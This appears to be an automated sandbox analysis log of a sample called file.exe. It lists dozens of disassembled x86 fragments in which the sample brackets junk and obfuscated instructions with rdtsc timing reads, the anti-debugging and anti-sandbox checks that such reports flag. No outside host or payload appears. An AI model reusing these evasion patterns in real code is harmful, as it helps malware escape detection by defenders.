                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CFB3 second address: E6CFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CFBA second address: E6CFC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E701DE second address: E70260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F60F0C8AB58h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F60F0C8AB58h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor ebx, 47005B63h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F60F0C8AB58h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 xchg eax, esi 0x00000055 jmp 00007F60F0C8AB64h 0x0000005a push eax 0x0000005b push edi 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E721F4 second address: E721FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E721FE second address: E7224F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F60F0C8AB62h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D1AEBh], esi 0x00000018 mov cl, 74h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d and ebx, dword ptr [ebp+12450B0Ch] 0x00000023 push esi 0x00000024 mov ebx, 520E3AEEh 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push eax 0x0000002c js 00007F60F0C8AB5Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E73176 second address: E73187 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E73187 second address: E7318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7318B second address: E73216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F60F0BA1028h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D2B28h] 0x0000002b jmp 00007F60F0BA1033h 0x00000030 mov dword ptr [ebp+122D1C7Fh], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F60F0BA1028h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2914h] 0x00000058 push 00000000h 0x0000005a mov ebx, dword ptr [ebp+122D2B04h] 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push edi 0x00000066 pop edi 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E73216 second address: E7321C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7418C second address: E741DE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1028h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F60F0BA1037h 0x00000012 mov edi, dword ptr [ebp+122D3368h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D2994h] 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D38E5h], ecx 0x00000029 mov dword ptr [ebp+122D1C77h], esi 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jns 00007F60F0BA102Ch 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E772F8 second address: E77382 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F60F0C8AB58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D28E8h] 0x00000029 xor dword ptr [ebp+122D17BCh], esi 0x0000002f push 00000000h 0x00000031 sub ebx, 2E34058Bh 0x00000037 pushad 0x00000038 jmp 00007F60F0C8AB61h 0x0000003d mov edi, dword ptr [ebp+122D2828h] 0x00000043 popad 0x00000044 push 00000000h 0x00000046 cld 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 jmp 00007F60F0C8AB62h 0x0000004e jne 00007F60F0C8AB61h 0x00000054 popad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77382 second address: E77387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78332 second address: E78336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78336 second address: E7833A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B117 second address: E6B1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jl 00007F60F0C8AB5Ch 0x0000000e jp 00007F60F0C8AB56h 0x00000014 jmp 00007F60F0C8AB68h 0x00000019 popad 0x0000001a nop 0x0000001b mov dword ptr [ebp+122D17C7h], esi 0x00000021 mov ebx, dword ptr [ebp+122D32E2h] 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cmc 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 sub dword ptr [ebp+12453C6Ch], edx 0x0000003c mov eax, dword ptr [ebp+122D16D1h] 0x00000042 cmc 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007F60F0C8AB58h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f mov di, 0A8Eh 0x00000063 nop 0x00000064 jmp 00007F60F0C8AB62h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jno 00007F60F0C8AB5Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E826E7 second address: E826EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E826EC second address: E82713 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F60F0C8AB62h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60F0C8AB5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82713 second address: E82719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82719 second address: E8271D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81EAF second address: E81EB9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81EB9 second address: E81ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81ECF second address: E81ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81ED9 second address: E81EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60F0C8AB56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82047 second address: E8204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6D1CD second address: E6D1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8588E second address: E858A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F60F0BA102Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E858A6 second address: E858AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E858AC second address: E858C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F60F0BA1034h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F60F0BA1026h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E858C2 second address: E858D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7242B second address: E72434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E733F2 second address: E7345A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F60F0C8AB56h 0x00000009 jmp 00007F60F0C8AB66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+122D3783h], eax 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bx, 9B3Ah 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c adc ebx, 72CB36C1h 0x00000032 mov eax, dword ptr [ebp+122D16C1h] 0x00000038 mov edi, dword ptr [ebp+122D1F2Ch] 0x0000003e mov dword ptr [ebp+12450A20h], eax 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, dword ptr [ebp+122D2B18h] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 jnl 00007F60F0C8AB56h 0x00000056 pop edi 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7345A second address: E7345F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7345F second address: E7347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60F0C8AB63h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7347E second address: E73499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7431B second address: E7431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7431F second address: E7433A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DEE8 second address: E8DEF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DEF2 second address: E8DEFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F60F0BA1026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D4C7 second address: E8D4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D620 second address: E8D639 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F60F0BA102Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D8F9 second address: E8D910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8D910 second address: E8D914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DD5F second address: E8DD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DD68 second address: E8DD82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94257 second address: E9425E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92F74 second address: E92F96 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F0BA102Ch 0x00000008 jl 00007F60F0BA1026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F60F0BA1028h 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93263 second address: E93269 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93269 second address: E932AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F60F0BA1039h 0x0000000a jmp 00007F60F0BA1037h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F0BA1026h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93559 second address: E9355D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9355D second address: E93582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1031h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F60F0BA1026h 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93582 second address: E93586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93586 second address: E935B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F60F0BA1026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F60F0BA1035h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnp 00007F60F0BA1026h 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92CD5 second address: E92CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93986 second address: E9398C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AFF second address: E93B09 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93C6A second address: E93CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA102Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F60F0BA1036h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 jnp 00007F60F0BA102Eh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93F53 second address: E93FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F60F0C8AB69h 0x0000000a jno 00007F60F0C8AB58h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F60F0C8AB69h 0x00000017 pushad 0x00000018 jmp 00007F60F0C8AB68h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93FAF second address: E93FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F60F12493A6h 0x00000012 jg 00007F60F12493A6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98B9F second address: E98BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B872 second address: E9B87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA0147 second address: EA014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA014B second address: EA0151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA0151 second address: EA0157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27195 second address: E2719E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2719E second address: E271B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F60F113721Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E271B7 second address: E271BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E679CA second address: E67A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F113721Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a js 00007F60F1137216h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov cl, bl 0x00000017 jmp 00007F60F1137227h 0x0000001c lea eax, dword ptr [ebp+12489779h] 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007F60F1137218h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c and ecx, dword ptr [ebp+122D19C7h] 0x00000042 mov dh, bl 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 jmp 00007F60F1137227h 0x0000004d pop esi 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E67A4D second address: E67A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E67A53 second address: E67A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F113721Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F1137222h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E67A79 second address: E44950 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60F12493A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jno 00007F60F12493A6h 0x00000011 call dword ptr [ebp+12450DCDh] 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F60F12493A8h 0x0000001f jns 00007F60F12493AAh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68030 second address: E68040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68139 second address: E6813D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6813D second address: E6815B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F60F1137224h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6815B second address: E6818E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F12493A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F60F12493B7h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F60F12493A8h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6818E second address: E681CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F113722Eh 0x00000008 jmp 00007F60F1137228h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137229h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68453 second address: E68458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68458 second address: E6845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
